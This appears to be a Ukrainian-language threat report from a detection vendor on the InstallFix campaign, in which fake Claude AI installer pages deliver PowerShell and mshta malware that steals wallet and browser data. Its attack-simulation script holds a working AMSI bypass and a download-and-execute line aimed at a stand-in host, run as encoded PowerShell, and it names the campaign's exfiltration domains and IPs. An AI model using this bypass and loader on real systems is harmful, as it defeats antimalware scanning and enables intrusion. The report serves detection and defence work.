InstallFix та Код Claude: Як Фальшиві Сторінки Встановлення Призводять до Реальних Компрометацій

Ruslan Mikhalov Керівник досліджень загроз у SOC Prime

Стежити

InstallFix та Код Claude: Як Фальшиві Сторінки Встановлення Призводять до Реальних Компрометацій

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Кампанія InstallFix поширює шкідливе програмне забезпечення через підроблені реклами Google, які імітують сторінки встановлення Claude AI. Жертви переконуються в запуску команд PowerShell, які викликають mshta.exe для отримання поліглот-файлу ZIP і HTA, який запускає багатоступеневу, безфайлову інфекційну ланцюжок. Навантаження відключає перевірку SSL і захисти AMSI, завантажує додатковий код з домену команд і управління, специфічного для жертви, і створює стійкість через планувальники задач. Операція націлена на організації з різних галузей і регіонів по всьому світу.

Розслідування

Дослідники відстежили повний шлях виконання від підробленої інсталяційної сторінки через mshta.exe, VBScript, і декілька рівнів закодованого PowerShell. Деобфускація показала, що шкідливе програмне забезпечення генерувало унікальний ідентифікатор для кожної жертви і використовувало його для побудови URL команд і управління, специфічних для хоста. Телеметрія мережі виявила вихідні комунікації до кількох шкідливих доменів та IP-адрес. Хоча кінцевий корисний вантаж не був повністю відновлений, спостережувана поведінка натякала на збирання даних та діяльність з ексфільтрації.

Смекшення

Захисники повинні блокувати доступ до виявлених шкідливих доменів і IP-адрес та обмежувати використання mshta.exe та інших застарілих інструментів скриптів, де це можливо. Кінцеві системи безпеки повинні бути налаштовані на виявлення спроб обійти AMSI та підробки перевірки SSL. Організації повинні також впровадити суворе фільтрування URL для трафіку реклами Google, яка веде до сторінок встановлення програмного забезпечення. Усвідомлення користувачів залишається критичним, особливо щодо ризику виконання команд, скопійованих зі спонсорованих результатів пошуку або неперевірених джерел.

Відповідь

Команди безпеки повинні подавати сповіщення про процеси, в яких mshta.exe запускає cmd.exe, powershell.exe, або інтерпретатори скриптів із підозрілими віддаленими URL. Ці події мають бути корельовані зі створенням планувальників задач та вихідними з’єднаннями з відомою інфраструктурою командування та управління. Якщо активність підтверджена, захисники повинні ізолювати хост, припинити шкідливі процеси та видалити будь-які механізми стійкості, такі як заплановані завдання. Потім повинно бути проведено криміналістичний огляд для ідентифікації залишкових компонентів безфайлового корисного вантажу.

“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions recon_google_ads[“Action – T1593.002 Search Open Websites/Domains: Search Engines
Description: Adversary places malicious sponsored results on Google to lure victims searching for Claude AI.”] class recon_google_ads action initial_access_phishing[“Action – T1566.002 Phishing: Spearphishing Link
Description: Victim clicks a malicious ad and is redirected to a fake Claude installer page that hosts a PowerShell command.”] class initial_access_phishing action user_exec_copy_paste[“Action – T1204.004 User Execution: Malicious Copy and Paste
Description: Victim copies the displayed PowerShell command and runs it in a console.”] class user_exec_copy_paste action execution_mshta[“Action – T1218.005 System Binary Proxy Execution: Mshta
Description: PowerShell invokes mshta.exe with a URL to a polyglot HTA/MSIX bundle.”] class execution_mshta action execution_htavbscript[“Action – T1027 Obfuscated Files or Information
Description: HTA VBScript runs via mshta, uses Shell.Application COM object to launch cmd.exe.”] class execution_htavbscript action execution_powershell_stager[“Action – T1140 Deobfuscate/Decode Files or Information
Description: PowerShell stager is base64‑encoded, split into variables and XOR‑decoded with key u201cAMSI_RESULT_NOT_DETECTEDu201d.”] class execution_powershell_stager action defense_evasion_amsi[“Action – T1211 Exploitation for Defense Evasion
Description: Script disables SSL certificate validation and patches AMSI to bypass detection.”] class defense_evasion_amsi action persistence_scheduled_task[“Action – T1053 Scheduled Task/Job
Description: Malware creates a scheduled task to relaunch the payload after system reboot.”] class persistence_scheduled_task action collection_automated[“Action – T1119 Automated Collection
Description: Collects eu2011wallet application data and browser data from the compromised host.”] class collection_automated action exfiltration_automated[“Action – T1020 Automated Exfiltration & T1029 Scheduled Transfer
Description: Collected data is sent to attacker‑controlled domains such as https://oakenfjrod.ru and IPs 104.21.0.95, 185.177.239.255.”] class exfiltration_automated action %% Nodes u2013 Tools / Processes tool_mshta[“Tool – Name: mshta.exe
Purpose: Executes HTML Application files.”] class tool_mshta tool tool_cmd[“Tool – Name: cmd.exe
Purpose: Windows command‑line interpreter.”] class tool_cmd tool tool_powershell[“Tool – Name: PowerShell
Purpose: Scripting engine used for payload delivery and decoding.”] class tool_powershell tool tool_amsi_patch[“Tool – Name: AMSI Patch
Purpose: Alters Antimalware Scan Interface to suppress detection.”] class tool_amsi_patch tool tool_schtasks[“Tool – Name: schtasks.exe
Purpose: Creates and manages scheduled tasks.”] class tool_schtasks tool %% Connections u2013 Flow recon_google_ads –>|leads_to| initial_access_phishing initial_access_phishing –>|leads_to| user_exec_copy_paste user_exec_copy_paste –>|executes| tool_powershell tool_powershell –>|calls| execution_mshta execution_mshta –>|uses| tool_mshta execution_mshta –>|downloads| execution_htavbscript execution_htavbscript –>|spawns| tool_cmd tool_cmd –>|runs| execution_powershell_stager execution_powershell_stager –>|uses| tool_powershell execution_powershell_stager –>|applies| defense_evasion_amsi defense_evasion_amsi –>|uses| tool_amsi_patch defense_evasion_amsi –>|creates| persistence_scheduled_task persistence_scheduled_task –>|uses| tool_schtasks persistence_scheduled_task –>|enables| collection_automated collection_automated –>|triggers| exfiltration_automated “

Потік атаки

Хід атаки та команди:
Атакуючий отримує шкідливий скрипт PowerShell через посилання на spear-phishing (T1566.002), яке завантажує вантаж із скомпрометованого сервера. Щоб уникнути виявлення AMSI, скрипт ін’єкціює рядок AMSI_RESULT_NOT_DETECTED у пам’ять процесу, потім використовує IEX оператор для виконання завантаженого коду. Вся команда кодується Base64 і запускається з -EncodedCommand флагом, що задовольняє всі три рядки вибору в правилі Sigma.

Крок за кроком:
1. Завантажте шкідливий вантаж (просту команду PowerShell, яка записує файл).
2. Ін’єкція маркера обхідки AMSI за допомогою встановлення приватного статичного поля amsiInitFailed.
3. Виконайте вантаж через IEX.
4. Запустіть весь ланцюжок за допомогою powershell.exe -EncodedCommand ….

Скрипт регресійного тесту:

# Симуляція атаки PowerShell у стилі InstallFix
# -------------------------------------------------
# 1. Визначте шкідливий однорядковий скрипт
$malicious = @"
`$bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
            .GetField('amsiInitFailed','NonPublic,Static')
`$bypass.SetValue(`$null,$true)
IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')
"@

# 2. Закодуйте скрипт в UTF-16LE, а потім у Base64 (вимога PowerShell)
$bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious)
$encoded = [Convert]::ToBase64String($bytes)

# 3. Виконайте за допомогою powershell.exe з прапором -EncodedCommand
$command = "powershell.exe -NoProfile -EncodedCommand $encoded"
Write-Host "Запуск шкідливого PowerShell..."
Invoke-Expression $command

Команди очищення:

# Видаліть всі тимчасові файли та припиніть збережені процеси
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force
Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
Write-Host "Очищення завершено."

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно